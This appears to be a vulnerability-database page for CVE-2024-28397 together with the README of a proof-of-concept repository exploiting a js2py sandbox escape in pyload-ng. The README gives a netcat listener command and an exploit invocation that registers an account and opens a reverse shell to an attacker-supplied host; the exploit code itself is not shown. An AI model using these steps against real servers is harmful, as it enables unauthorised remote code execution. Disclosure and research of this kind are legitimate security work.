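Related vulnerability
Title: Js2Py security vulnerability (CVE-2024-28397)
Description: Js2Py is a library from the Python Foundation, used to translate JavaScript into Python code. Js2Py 0.74 and earlier contain a security vulnerability that stems from an issue in the component js2py.disable_pyimport(); an attacker can exploit it to execute arbitrary code through a crafted API call.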
Description
PoC exploit for CVE-2024-28397 – Remote Code Execution in pyload-ng via js2py sandbox escape
Introduction
# 🚨 Remote Code Execution – CVE-2024-28397 (pyload-ng / js2py)
This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.
> ⚠️ **Disclaimer:**
> This PoC is for **educational and research purposes only**.
> Do not use it on systems you do not own or have explicit permission to test.
> The author is **not responsible** for any misuse of this code.
---
## 🐛 Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.
---
## 📦 Requirements & Setup
You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.
- 🖥️ Target → Vulnerable pyload-ng instance with `/run_code` endpoint accessible
## 🎧 Listener → Start before running exploit:
`nc -lvnp 4444`
## 🖥️ Usage:
`python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123`
## 📌 Example Output:
- [+] Register successful!
- [+] Login successful
- [+] exploit worked
File snapshot
[4.0K] /data/pocs/afa1980625fbc99231264ceec074b788e48467c9
├── [2.5K] poc.py
└── [1.3K] README.md
0 directories, 2 files